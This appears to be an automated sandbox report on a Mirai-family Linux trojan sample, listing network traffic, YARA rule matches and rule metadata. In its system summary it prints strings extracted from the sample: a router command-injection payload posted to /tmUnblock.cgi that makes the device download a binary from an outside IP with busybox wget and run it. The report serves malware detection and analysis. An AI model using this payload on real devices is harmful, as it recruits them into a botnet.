Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40498
Source: unknown	Network traffic detected: HTTP traffic on port 37418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51190
Source: unknown	Network traffic detected: HTTP traffic on port 51994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51196
Source: unknown	Network traffic detected: HTTP traffic on port 39252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51198
Source: unknown	Network traffic detected: HTTP traffic on port 53250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42626 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53586 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53466 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36634 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53902
Source: unknown	Network traffic detected: HTTP traffic on port 51056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53906
Source: unknown	Network traffic detected: HTTP traffic on port 52116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53918
Source: unknown	Network traffic detected: HTTP traffic on port 46690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53916
Source: unknown	Network traffic detected: HTTP traffic on port 34934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39620
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39622
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39624
Source: unknown	Network traffic detected: HTTP traffic on port 55130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40604
Source: unknown	Network traffic detected: HTTP traffic on port 34910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40602
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39616
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40608
Source: unknown	Network traffic detected: HTTP traffic on port 60542 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41934
Source: unknown	Network traffic detected: HTTP traffic on port 57612 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39610
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39612
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39604
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41926
Source: unknown	Network traffic detected: HTTP traffic on port 42772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41928
Source: unknown	Network traffic detected: HTTP traffic on port 41458 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41924
Source: unknown	Network traffic detected: HTTP traffic on port 42110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41920
Source: unknown	Network traffic detected: HTTP traffic on port 45556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60554 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41918
Source: unknown	Network traffic detected: HTTP traffic on port 57624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39602
Source: unknown	Network traffic detected: HTTP traffic on port 34200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41916
Source: unknown	Network traffic detected: HTTP traffic on port 55840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41910
Source: unknown	Network traffic detected: HTTP traffic on port 38288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35586 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42580 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41900
Source: unknown	Network traffic detected: HTTP traffic on port 54274 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /tmUnblock.cgi HTTP/1.1

Source: ELF static info symbol of initial sample

.symtab present: no

Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 86O41HaCl5.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
